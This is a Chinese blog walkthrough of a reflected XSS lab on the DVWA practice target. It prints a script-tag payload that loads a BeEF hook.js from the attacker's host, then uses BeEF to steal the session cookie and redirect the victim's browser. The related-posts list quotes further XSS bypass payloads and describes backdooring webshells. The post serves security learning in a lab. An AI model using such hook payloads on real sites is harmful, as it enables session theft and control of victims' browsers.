DVWA靶场+BEEFxss平台复现XSS脚本攻击(获取cookie,跳转指定网页)

于 2023-09-18 17:37:38 发布
阅读量414 收藏 1
点赞数
文章标签: xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/132986795
版权

前提条件

1.kali搭建安装好beef

2.win10搭建好dvwa靶场

准备条件

kali内启动beef

Kali的浏览器内访问127.0.0.1:3000打开beef的本地界面

启动dvwa靶场,调整安全等级为low

利用反射型XSS获取cookie

查看钩子文件地址,可以理解为一个webshell,beef用来连接和控制用户浏览器的,只要用户访问这个beef的hook.js文件,beef就可以自动与用户浏览器建立连接

点击反射型xss页面,输入访问hook.js文件的payload,IP换成自己的beef所在主机的IP

<script src="http://192.168.80.145:3000/hook.js"></script>

点击提交,查看beef已经建立连接

点击功能模块,获取cookie

网页内查看cookie,与获取的cookie相同,获取cookie成功

点击重定向模块,输入要跳转的网址,点击执行

返回靶场页面发现已成功跳转至指定页面。

TIME908
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
Web漏洞_XSScookie与session、DVWA1.9版本XSS反射型、存储型靶机实验、BeEF基本使用)
BeatRex的博客
04-05 1633
一、原理 二、分类 三、绕过 注意标签的闭合 大小写绕过 双写绕过 图片标签加事件绕过 <img src=# alert('xss')>)
DVWA XSS漏洞
ch258563的博客
04-02 255
DVWA XSS漏洞
XSS-DVWA学习及JS脚本和BeEFXU学习
m0_62636343的博客
09-22 458
XSS-DVWA学习及JS脚本和BeEFXU学习
Web漏洞-XSS跨站之订单系统实操-WebShell箱子反杀
ran的博客
03-16 1004
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子的后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实反杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台。
self xss+csrf dvwa靶机
qq_52016943的博客
08-17 241
self XSS+CSRF
DVWA靶场XSS三种类型漏洞练习
c_programj的博客
05-14 1600
DVWA靶场XSS三种漏洞练习反射型XSS(非持久性)【low】【Medium】【High】【Impossible】存储型XSS(持久性)【Low】【Medium】【High】【Impossible】DOM型【Low】【Medium】【High】【Impossible】总结:XSS漏洞常见函数: 反射型XSS(非持久性) 反射型 【low】 后台码源: <?php header ("X-XSS-Protection: 0"); // Is there any input? if
DVWA靶场下的xss漏洞练习及分析
记录学习,一起进步
12-07 567
DVWA靶场进行xss漏洞的练习记录及分析
DVWA靶场漏洞记录
weixin_66669317的博客
07-25 222
dvwa的漏洞
DVWA靶场XSS反射性和存储型的漏洞测试(low~high)
weixin_51585429的博客
11-07 1973
DVWA靶场XSS反射型、存储型漏洞模块low~high等级
dvwa靶场,里面也有xss靶场
09-24
我的连接数据库用户名是root,密码是123456,自己的不一样的话,在DVWA-master\config目录下config.inc.php文件内修改自己的密码。
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
beff工具的简单使用
hcufo的博客
09-05 72
举例:利用kail虚拟服务器的beff工具获取cookie。然后在dvwa靶场中注入而与代码。这个工具还有很多功能,慢慢体验。进入选项,查看cookie。事先搭建dvwa靶场
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4572
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
XSS漏洞及分析
qq_61739597的博客
09-01 1973
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
Discuz XSS得webshell
weixin_33872660的博客
08-05 295
By racle @tian6.com欢迎帖.但请保留版权信息.受影响版本:Discuz&lt;6.1.0,gbk+utf+big53天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.php?goto=findpost&amp;pid=547...
CTFHub XSS DOM WriteUp
柠檬i的博客
07-05 1748
XSS攻击方式涉及将恶意脚本嵌入到链接或重定向 URL 中,以便在用户点击该链接或重定向时触发脚本的执行。攻击者可以利用 XSS 攻击来进行会话劫持、盗取用户信息、篡改页面内容等恶意活动。 为了防止 XSS 攻击,开发人员应该对用户输入的数据进行适当的验证、过滤和义,以确保在将其嵌入到页面中之前进行正确的处理。此外,安全的编程实践和使用安全的开发框架也是防止 XSS 的关键。
dvwa靶场xss攻击
09-25
DVWA靶场是一个用于学习和测试网络安全漏洞的虚拟环境。在DVWA靶场中,有一个特定的漏洞被称为XSS(跨站脚本攻击)。XSS攻击是一种利用网页应用程序对用户输入的处理不当而进行的攻击。通过在受害者浏览器中执行恶意脚本攻击者可以窃取用户的敏感信息、劫持用户会话或者操纵网页内容。 在DVWA靶场中,有两种XSS攻击方式:存储型XSS和反射型XSS。存储型XSS攻击是指攻击者将恶意代码嵌入到后台服务器的存储区域,当其他用户访问这个页面时,恶意代码就会被执行。而反射型XSS攻击是通过欺骗用户点击一个包含恶意代码的链接来实攻击。 要在DVWA靶场中进行XSS攻击,可以按照以下步骤进行: 1. 首先,需要确定XSS漏洞的存在,可以通过尝试在输入框中插入一些特殊字符或标签,如<script>标签,来判断是否能成功执行恶意代码。 2. 如果成功执行了恶意代码,可以尝试构造payload来获取用户的cookie等敏感信息。 3. 进一步,可以尝试利用XSS漏洞来进行会话劫持或者篡改网页内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值